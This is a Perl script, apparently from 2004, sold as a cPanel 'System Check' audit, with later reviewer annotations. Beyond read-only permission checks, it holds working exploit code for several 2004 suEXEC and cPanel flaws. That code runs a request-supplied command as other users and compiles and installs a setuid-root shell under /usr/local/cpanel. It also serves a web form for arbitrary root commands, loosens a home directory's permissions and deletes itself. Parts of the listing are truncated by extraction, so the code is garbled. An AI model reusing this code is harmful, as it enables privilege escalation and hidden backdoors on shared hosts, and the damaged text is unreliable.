#!/usr/bin/perl -w
# PROGRAM: tests.pl
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# USAGE: This script MUST be run from a php script
# in order for the tests to work correctly. (It
# will NOT work to execute this script directly
# from the browser because it's written in Perl.)
# See a-squad.com/audit for the php wrapper code.
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com
#
# NOTE(review): this listing appears to have been recovered from an HTML
# rendering. Markup inside the output strings is gone and text between '<'
# and '>' was dropped, so several statements below are truncated and the file
# does not compile as shown. Damaged spots are marked; nothing has been
# reconstructed.
#
# Read top to bottom, the script does two different things:
#   1. read-only checks of account isolation (UID, home-directory and webroot
#      permission bits);
#   2. active tests that try to run a request-supplied command as another
#      account through the 2004 cPanel/suEXEC issues named in the messages.
# Part 2 writes files, runs external programs and changes permissions; treat
# it as exploit code, not as a passive audit.
use strict;
use CGI ':standard';

# An optional first command-line argument is installed as the CGI query
# string (presumably how the PHP wrapper hands the request over).
if (my $query = shift) { $ENV{QUERY_STRING} = $query; $ENV{REQUEST_METHOD}="GET"; }
my $q = new CGI;
my @users = ();                   # accounts offered in the form's username menu
my $me = "";                      # account that owns the current directory
my $default_command = "id";       # command run when the request names none
my $dummy = "/tmp/tests";         # scratch directory used by the active tests
$| = 1;                           # unbuffered output
print start_html("System Check");
my $action = "cpanel.php";
# Result flags: $secure and $locked start true and are only ever cleared;
# $common marks execution as "nobody", $cpanel holds the cPanel version output,
# $cpwrap marks a setuid wrap binary, $canexe gates the command form at the end.
my $secure = 1; my $locked = 1; my $common = 0; my $cpanel = 0; my $canexe = 0; my $cpwrap = 0;
print qq{
ADVERTISEMENT: A-Squad Certified Secure cPanel Hosting
\n};
print "
    Performing white box security audit...\n";

# cPanel presence: the directory must exist; the version string comes from
# running the cpanel binary with -V.
if (-d "/usr/local/cpanel") {
  chomp($cpanel = `/usr/local/cpanel/cpanel -V`);
  print "
  1. PASSED: cPanel INSTALLED ($cpanel)\n";
} else {
  print "
  2. FAILED: cPanel NOT INSTALLED\n";
  print "Explain\n";
}

# Real UID of this process. UIDs below 500 are reported as privileged;
# presumably 500 is where regular accounts start on the intended hosts.
my $uid = $<;
if ($uid < 500) {
  print "
  3. FAILED: Privileged UID Vulnerability Check ($uid)\n";
  print "Explain\n";
} else {
  print "
  4. PASSED: Privileged UID Vulnerability Check ($uid)\n";
}

# Running as "nobody" is reported as a failure and marks the host as $common;
# the PASSED wording ("probably not shared") suggests the concern is one UID
# shared by every hosted site.
if (my $nam = getpwuid $uid) {
  if ($nam eq "nobody") {
    print "
  5. FAILED: nobody execution\n";
    print "Explain\n";
    $secure = 0;
    $common = 1;
  } else {
    print "
  6. PASSED: User $nam ($uid) is probably not shared\n";
  }
} else {
  print "
  7. FAILED: Privileged UID Vulnerability Check ($uid)\n";
}

# Walk the whole passwd database. Every account with UID >= 500 is collected
# in @users; the account whose home directory is a prefix of the current
# working directory becomes $me and its home becomes $HOME. The loop's $uid
# shadows the outer $uid.
$ENV{PWD} ||= `pwd`;
chomp $ENV{PWD};
setpwent;
while (my ($name,$passwd,$uid,$gid, $quota,$comment,$gcos,$dir) = getpwent) {
  if ($uid >= 500) {
    push @users, $name;
    if ($ENV{PWD} =~ m%^\Q$dir\E/%) { $me = $name; $ENV{HOME} = $dir; }
  }
}

# Permission checks on the home directory, its parent and public_html. These
# only read stat data. Each FAILED result names a mode bit that is set;
# clearing that bit on the directory is what makes the check pass.
if ($me && $ENV{HOME} && -d $ENV{HOME}) {
  # `stat _` reuses the stat result of the -d test above.
  my $mode = (stat _)[2];
  # Bit 1 = other-execute: any local account can traverse into $HOME.
  if ($mode & 1) {
    print "
  8. FAILED: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
    print "Explain\n";
    $secure = 0;
    $locked = 0;
  } else {
    print "
  9. PASSED: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
  }
  # Bit 4 = other-read: any local account can list $HOME.
  if ($mode & 4) {
    print "
  10. FAILED: Simple \$HOME Scanning [$ENV{HOME}]\n";
    print "Explain\n";
    $secure = 0;
  } else {
    print "
  11. PASSED: Simple \$HOME Scanning [$ENV{HOME}]\n";
  }
  # Bit 32 (octal 040) = group-read: members of the owning group can list $HOME.
  if ($mode & 32) {
    print "
  12. FAILED: Group \$HOME Scanning [$ENV{HOME}]\n";
    print "Explain\n";
    $secure = 0;
  } else {
    print "
  13. PASSED: Group \$HOME Scanning [$ENV{HOME}]\n";
  }
  # Same other-read test on the parent of $HOME (listing it enumerates accounts).
  $mode = (stat "$ENV{HOME}/..")[2];
  if ($mode & 4) {
    print "
  14. FAILED: Root /home scanning\n";
    print "Explain\n";
    $secure = 0;
  } else {
    print "
  15. PASSED: Root /home scanning\n";
  }
  # Webroot: only reported when $HOME itself is traversable (!$locked).
  # This first test does not clear $secure; the stricter one below does.
  # NOTE(review): if public_html does not exist, stat returns an empty list and
  # $mode is undef here - confirm how the wrapper deals with the warnings.
  $mode = (stat "$ENV{HOME}/public_html")[2];
  if (!$locked && $mode & 1) {
    print "
  16. FAILED: Simple WEBROOT Protection\n";
    print "Explain\n";
  } else {
    print "
  17. PASSED: Simple WEBROOT Protection\n";
  }
  # Group id of public_html, compared numerically with this process's real
  # GID ($(); bit 8 (octal 010) = group-execute. Fails when the shared web user
  # can enter the webroot through its group, or anyone can through other-execute.
  my $pubg = (stat _)[5];
  if (($common && !$locked and $(==$pubg && ($mode & 8)) or (!$locked && $mode & 1)) {
    print "
  18. FAILED: Real WEBROOT Protection\n";
    print "Explain\n";
    $secure = 0;
  } else {
    print "
  19. PASSED: Real WEBROOT Protection\n";
  }
} else {
  print "
  20. FAILED: Unable to locate unprivileged homedir\n";
}

# Both values come straight from the request; there is no authentication or
# validation anywhere in this script.
my $command = $q->param("command") || $default_command;
my $who = $q->param("username") || $me;

# From here on the script is no longer read-only. On a cPanel host where it
# runs as "nobody" it tries to execute $command as the account $who.
# Artefacts this code creates, for anyone investigating a host: the directory
# /tmp/tests holding Cpanel.pm, SafeFile.pm, wrap.c, wrap and a "cpanel"
# symlink; a transient bin.ROOT directory under /usr/local/cpanel; and a
# setuid-root, mode 04777 /usr/local/cpanel/wrap. The clean-up below removes
# only /tmp/tests, so the wrap binary is the durable indicator.
if ($cpanel && $common) {
  # NOTE(review): reported as PASSED without any probe in this branch; read it
  # as "not tested here".
  print "
  21. PASSED: CVE-2004-0490 mod_phpsuexec PATH_TRANSLATED Vulnerability Test\n";
  if ($command and $who) {
    my $wraptest = "/usr/local/cpanel/wrap";
    # True when wrap exists, is executable and carries the setuid bit.
    $cpwrap = 1 if -x $wraptest && -u _;
    if ($who eq "root") {
      print "
  22. SKIPPED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n";
      print "Explain\n";
      $canexe = $cpwrap;
    } else {
      # mkdir/chdir/symlink/open results are not checked: if any of them fails,
      # the following writes land in whatever the current directory is.
      mkdir $dummy, 0755;
      chdir $dummy;
      symlink("/usr/local/cpanel","cpanel");
      my $dir = (getpwnam $who)[7];   # home directory of the target account
      open (DUMMY,">Cpanel.pm");
      $ENV{HOME} = $dir;
      # NOTE(review): the next statement is truncated by the extraction (text
      # between '<' and '>' is missing), including the close of DUMMY and the
      # declaration of $out that the test below reads. Left exactly as found.
      print DUMMY qq{chdir "$dir";warn "\n";\nexec <&1`;
      if ($out =~ /^\n/) {
        print "
  23. FAILED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n";
        print "Explain\n";
        print "
    EXEC [$command] as [$who]:\n";
        # NOTE(review): the two substitutions below look like HTML-escaping of
        # $out before it is printed; the entity text and the print itself were
        # lost in extraction.
        $out =~ s/&/&/g;
        $out =~ s/\n";
        $canexe = 1;
      } else {
        print "
  24. PASSED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n";
        print "\n" if $out;
      }
    }
    # Reached only when execution as another account was already shown. If no
    # setuid wrap exists yet, this part builds one and has it installed under
    # /usr/local/cpanel; the wrap check is then repeated.
    if ($canexe) {
      if (!$cpwrap) {
        open (DUMMY,">wrap.c");
        print DUMMY qq{int main() { initgroups("root",0);setgid(0);setuid(0);execl("/bin/sh","sh",0); }\n};
        close DUMMY;
        # Any compiler output counts as failure and skips the install step.
        if (my $cc = `cc -o wrap wrap.c 2>&1`) {
          print "\n";
        } else {
          open (DUMMY,">SafeFile.pm");
          print DUMMY qq{exec q{ cd /usr/local/cpanel;mv bin bin.ROOT;mkdir bin;echo 'install -o root -g wheel -m 04777 $dummy/wrap .' > bin/backupadmin;chmod 755 bin/backupadmin;bin.ROOT/backupwrap;rm bin/backupadmin;rmdir bin;mv bin.ROOT bin };\n};
          close DUMMY;
          my $out = `/usr/local/apache/bin/suexec cpanel cpanel cpanel/bin/proftpdvhosts 2>&1`;
        }
      }
      $cpwrap = 1 if -x $wraptest && -u _;
    }
    chdir "/";
    if ($cpwrap) {
      print "
  25. FAILED: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
      print "Explain\n";
      # "root" is added to the username menu once a setuid wrap is present.
      push @users, "root";
      if ($who eq "root") {
        print "
    EXEC [$command] as [$who]:\n";
        # The request's command is passed through the environment and piped
        # into the setuid wrap binary.
        $ENV{EXEC} = $command;
        my $out = `echo \$EXEC | $wraptest 2>&1`;
        # NOTE(review): damaged in extraction, same as the escaping lines above.
        $out =~ s/&/&/g;
        $out =~ s/\n";
      }
    } else {
      print "
  26. PASSED: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
    }
    # Removes the scratch directory only; /usr/local/cpanel/wrap is untouched.
    system("rm","-rf",$dummy);
  }
} elsif ($cpanel && !$common) {
  # cPanel host, script running as a regular account.
  # NOTE(review): the command line below lost its redirections in extraction
  # (text between '<' and '>'); left as found.
  my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php &1`;
  # Output mentioning phpinfo() is taken as proof that the php binary ran the
  # file named in PATH_TRANSLATED.
  if ($probe =~ /phpinfo\(\)/) {
    print "
  27. FAILED: CVE-2004-0490 mod_phpsuexec PATH_TRANSLATED Vulnerability Test\n";
    print "Explain\n";
    $canexe = 1;
    $secure = 0;
    print "
    EXEC [$command] as [$who]:\n";
    # $command is request input and is run through the shell by the backticks:
    # wherever this file is reachable it is a command-execution endpoint.
    my $out = `$command 2>&1`;
    # NOTE(review): damaged in extraction; originally output escaping and a
    # print, as far as can be told.
    $out =~ s/&/&/g;
    $out =~ s/\n";
    if ($who ne $me) {
      print "Submit again to switch to another user...
    \n";
      # The form target is pointed at a randomly chosen guessed path under the
      # other account's ~user URL.
      my @guess = qw(/index.php /forum/index.php /forums/index.php);
      my $rand = $guess[rand @guess];
      $action = "/~$who$rand/~$me/cpanel.php";
      # Adds other-execute to the script owner's own home directory, i.e. it
      # creates the condition the "Stealth Snoop" check reports as FAILED.
      # Single-string system() goes through the shell with $ENV{HOME} interpolated.
      system "chmod o+x $ENV{HOME}";
    }
  } else {
    print "
  28. PASSED: CVE-2004-0490 mod_phpsuexec PATH_TRANSLATED Vulnerability Test\n";
  }
  # NOTE(review): the next two results are printed without any probe in this
  # branch; read them as "not tested here", not as evidence.
  print "
  29. PASSED: CVE-2004-0529 suEXEC mod_php Taint Vulnerability Test\n";
  print "
  30. PASSED: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
}

# Overall verdict, printed only on cPanel hosts. $secure is cleared by the
# permission checks, by "nobody" execution and by the PATH_TRANSLATED probe.
if ($cpanel) {
  if ($secure) {
    print "
  31. PASSED: Congratulations, your cPanel configuration is secure!\n";
  } else {
    print "
  32. FAILED: One or more insecure cPanel configurations were detected. Visit A-Squad.Com for details on where to find more secure cPanel hosting.\n";
  }
}
print "
";
# The command form (username menu built from the passwd walk, free-text
# command field) is emitted only when $canexe was set by one of the tests.
print start_form(-method => "GET",-action => $action,-name=>"f"),
  "Username: ",
  popup_menu (-name => "username", -values => [ sort @users ], -default => $who, ),
  br,
  "Password: (not required)",br,
  "Command: ",
  textfield(-name => "command",-value=> $command),
  br,
  submit(-value=> "Test Execution"),
  end_form,
  "\n\n" if $canexe;
print end_html;
# Self-removal: -M is the script file's age in days at program start; once it
# exceeds 0.01 days (roughly 14 minutes) the script unlinks itself. The file
# may therefore be gone after the fact; web-server request logs and the
# /usr/local/cpanel/wrap binary are the evidence that remains.
-M$0>0.01&&unlink$0;